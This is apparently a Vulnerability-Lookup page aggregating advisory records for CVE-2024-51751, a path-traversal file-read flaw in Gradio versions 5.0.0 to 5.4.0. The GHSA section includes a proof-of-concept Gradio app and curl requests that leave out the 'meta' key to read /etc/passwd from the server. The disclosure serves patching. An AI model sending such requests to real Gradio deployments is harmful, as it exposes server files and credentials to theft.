Vulnerability-Lookup

PYSEC-2024-275

Vulnerability from pysec - Published: 2024-11-06 20:15 - Updated: 2026-05-20 09:19

Details

Gradio is an open-source Python package designed to enable quick builds of a demo or web application. If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server. This issue has been addressed in release version 5.5.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability.

Severity

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Impacted products

Name	purl
gradio	pkg:pypi/gradio

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "gradio",
        "purl": "pkg:pypi/gradio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.5.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "5.0.0",
        "5.0.1",
        "5.0.2",
        "5.1.0",
        "5.3.0",
        "5.4.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2024-51751",
    "GHSA-rhm9-gp5p-5248"
  ],
  "details": "Gradio is an open-source Python package designed to enable quick builds of a demo or web application. If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server. This issue has been addressed in release version 5.5.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability.",
  "id": "PYSEC-2024-275",
  "modified": "2026-05-20T09:19:01.741927Z",
  "published": "2024-11-06T20:15:05.557Z",
  "references": [
    {
      "type": "EVIDENCE",
      "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-rhm9-gp5p-5248"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

CVE-2024-51751 (GCVE-0-2024-51751)

Vulnerability from cvelistv5 – Published: 2024-11-06 19:11 – Updated: 2024-11-06 19:58

Title

Arbitrary file read with File and UploadButton components in Gradio

Summary

Severity

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/gradio-app/gradio/security/adv…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
gradio-app	gradio	Affected: >= 5.0.0, < 5.5.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "gradio",
            "vendor": "gradio_project",
            "versions": [
              {
                "lessThan": "5.5.0",
                "status": "affected",
                "version": "5.0.0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-51751",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-11-06T19:54:26.224028Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-06T19:58:13.376Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "gradio",
          "vendor": "gradio-app",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 5.0.0, \u003c 5.5.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Gradio is an open-source Python package designed to enable quick builds of a demo or web application. If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server. This issue has been addressed in release version 5.5.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-11-06T19:11:38.731Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/gradio-app/gradio/security/advisories/GHSA-rhm9-gp5p-5248",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-rhm9-gp5p-5248"
        }
      ],
      "source": {
        "advisory": "GHSA-rhm9-gp5p-5248",
        "discovery": "UNKNOWN"
      },
      "title": "Arbitrary file read with File and UploadButton components in Gradio"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-51751",
    "datePublished": "2024-11-06T19:11:38.731Z",
    "dateReserved": "2024-10-31T14:12:45.790Z",
    "dateUpdated": "2024-11-06T19:58:13.376Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

GHSA-RHM9-GP5P-5248

Vulnerability from github – Published: 2024-11-06 16:29 – Updated: 2024-11-06 23:38

Summary

Gradio vulnerable to arbitrary file read with File and UploadButton components

Details

Summary

If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server.

Details

Consider the following application where a user can upload a file and preview its content:

import gradio as gr

def greet(value: bytes):
    return str(value)

demo = gr.Interface(fn=greet, inputs=gr.File(type="binary"), outputs="textbox")

if __name__ == "__main__":
    demo.launch()

If we run this application and make the following request (which attempts to read the /etc/passwd file)

curl 'http://127.0.0.1:7860/gradio_api/run/predict' -H 'content-type: application/json' --data-raw '{"data":[{"path":"/etc/passwd","orig_name":"test.txt","size":4,"mime_type":"text/plain","meta":{"_type":"gradio.FileData"}}],"event_data":null,"fn_index":0,"trigger_id":8,"session_hash":"mnv42s5gt7"}'

Then this results in the following error on the server

gradio.exceptions.InvalidPathError: Cannot move /etc/passwd to the gradio cache dir because it was not uploaded by a user.

This is expected. However, if we now remove the "meta":{"_type":"gradio.FileData"} from the request:

curl 'http://127.0.0.1:7860/gradio_api/run/predict' -H 'content-type: application/json' --data-raw '{"data":[{"path":"/etc/passwd","orig_name":"test.txt","size":4,"mime_type":"text/plain"}],"event_data":null,"fn_index":0,"trigger_id":8,"session_hash":"mnv42s5gt7"}'

This doesn't cause an error and results in the content of /etc/passwd being shown in the response!

This works because Gradio relies on the processing_utils.async_move_files_to_cache to sanitize all incoming file paths in all inputs. This function performs the following operation

    return await client_utils.async_traverse(
        data, _move_to_cache, client_utils.is_file_obj_with_meta
    )

where client_utils.is_file_obj_with_meta is used as a filter which tells on which inputs to perform the _move_to_cache function (which also performs the allowed/disallowed check on the file path). The problem is that client_utils.is_file_obj_with_meta is not guaranteed to trigger for every input that contains a file path:

def is_file_obj_with_meta(d) -> bool:
    """
    Check if the given value is a valid FileData object dictionary in newer versions of Gradio
    where the file objects include a specific "meta" key, e.g.
    {
        "path": "path/to/file",
        "meta": {"_type: "gradio.FileData"}
    }
    """
    return (
        isinstance(d, dict)
        and "path" in d
        and isinstance(d["path"], str)
        and "meta" in d
        and d["meta"].get("_type", "") == "gradio.FileData"
    )

For example, as in the PoC, the file path won't be checked if the meta key is not present in the request or if _type is not gradio.FileData.

Then, the path remains under control of the attacker and is used to read a file in _process_single_file function in file.py and upload_button.py (and possibly other places)

PoC

As described above, run the following Gradio app

import gradio as gr

def greet(value: bytes):
    return str(value)

demo = gr.Interface(fn=greet, inputs=gr.File(type="binary"), outputs="textbox")

if __name__ == "__main__":
    demo.launch()

And make the following request

curl 'http://127.0.0.1:7860/gradio_api/run/predict' -H 'content-type: application/json' --data-raw '{"data":[{"path":"/etc/passwd","orig_name":"test.txt","size":4,"mime_type":"text/plain"}],"event_data":null,"fn_index":0,"trigger_id":8,"session_hash":"mnv42s5gt7"}'

Impact

Arbitrary file read in specific Gradio applications that use File or UploadButton components to upload files and echo/preview the content to the user.

Severity

0.0 (None)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

6.9 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "gradio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.5.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-51751"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-06T16:29:57Z",
    "nvd_published_at": "2024-11-06T20:15:05Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nIf File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server.\n\n### Details\nConsider the following application where a user can upload a file and preview its content:\n```\nimport gradio as gr\n\ndef greet(value: bytes):\n    return str(value)\n\ndemo = gr.Interface(fn=greet, inputs=gr.File(type=\"binary\"), outputs=\"textbox\")\n\nif __name__ == \"__main__\":\n    demo.launch()\n```\n\nIf we run this application and make the following request (which attempts to read the `/etc/passwd` file)\n```\ncurl \u0027http://127.0.0.1:7860/gradio_api/run/predict\u0027 -H \u0027content-type: application/json\u0027 --data-raw \u0027{\"data\":[{\"path\":\"/etc/passwd\",\"orig_name\":\"test.txt\",\"size\":4,\"mime_type\":\"text/plain\",\"meta\":{\"_type\":\"gradio.FileData\"}}],\"event_data\":null,\"fn_index\":0,\"trigger_id\":8,\"session_hash\":\"mnv42s5gt7\"}\u0027\n```\n\nThen this results in the following error on the server\n\n```\ngradio.exceptions.InvalidPathError: Cannot move /etc/passwd to the gradio cache dir because it was not uploaded by a user.\n``` \n\nThis is expected. However, if we now remove the `\"meta\":{\"_type\":\"gradio.FileData\"}` from the request:\n```\ncurl \u0027http://127.0.0.1:7860/gradio_api/run/predict\u0027 -H \u0027content-type: application/json\u0027 --data-raw \u0027{\"data\":[{\"path\":\"/etc/passwd\",\"orig_name\":\"test.txt\",\"size\":4,\"mime_type\":\"text/plain\"}],\"event_data\":null,\"fn_index\":0,\"trigger_id\":8,\"session_hash\":\"mnv42s5gt7\"}\u0027\n```\nThis doesn\u0027t cause an error and results in the content of /etc/passwd being shown in the response!\n\n\nThis works because Gradio relies on the `processing_utils.async_move_files_to_cache` to sanitize all incoming file paths in all inputs. This function performs the following operation\n```\n    return await client_utils.async_traverse(\n        data, _move_to_cache, client_utils.is_file_obj_with_meta\n    )\n```\nwhere `client_utils.is_file_obj_with_meta` is used as a filter which tells on which inputs to perform the `_move_to_cache` function (which also performs the allowed/disallowed check on the file path). The problem is that `client_utils.is_file_obj_with_meta` is not guaranteed to trigger for every input that contains a file path:\n\n```\ndef is_file_obj_with_meta(d) -\u003e bool:\n    \"\"\"\n    Check if the given value is a valid FileData object dictionary in newer versions of Gradio\n    where the file objects include a specific \"meta\" key, e.g.\n    {\n        \"path\": \"path/to/file\",\n        \"meta\": {\"_type: \"gradio.FileData\"}\n    }\n    \"\"\"\n    return (\n        isinstance(d, dict)\n        and \"path\" in d\n        and isinstance(d[\"path\"], str)\n        and \"meta\" in d\n        and d[\"meta\"].get(\"_type\", \"\") == \"gradio.FileData\"\n    )\n```\n\nFor example, as in the PoC, the file path won\u0027t be checked if the `meta` key is not present in the request or if `_type` is not `gradio.FileData`.\n\nThen, the path remains under control of the attacker and is used to read a file in `_process_single_file` function in `file.py` and `upload_button.py` (and possibly other places)\n\n### PoC\nAs described above, run the following Gradio app\n\n```\nimport gradio as gr\n\ndef greet(value: bytes):\n    return str(value)\n\ndemo = gr.Interface(fn=greet, inputs=gr.File(type=\"binary\"), outputs=\"textbox\")\n\nif __name__ == \"__main__\":\n    demo.launch()\n```\n\nAnd make the following request\n```\ncurl \u0027http://127.0.0.1:7860/gradio_api/run/predict\u0027 -H \u0027content-type: application/json\u0027 --data-raw \u0027{\"data\":[{\"path\":\"/etc/passwd\",\"orig_name\":\"test.txt\",\"size\":4,\"mime_type\":\"text/plain\"}],\"event_data\":null,\"fn_index\":0,\"trigger_id\":8,\"session_hash\":\"mnv42s5gt7\"}\u0027\n```\n\n### Impact\nArbitrary file read in specific Gradio applications that use File or UploadButton components to upload files and echo/preview the content to the user.",
  "id": "GHSA-rhm9-gp5p-5248",
  "modified": "2024-11-06T23:38:33Z",
  "published": "2024-11-06T16:29:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-rhm9-gp5p-5248"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51751"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gradio-app/gradio"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Gradio vulnerable to arbitrary file read with File and UploadButton components"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

PYSEC-2024-275

CVE-2024-51751 (GCVE-0-2024-51751)

GHSA-RHM9-GP5P-5248

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature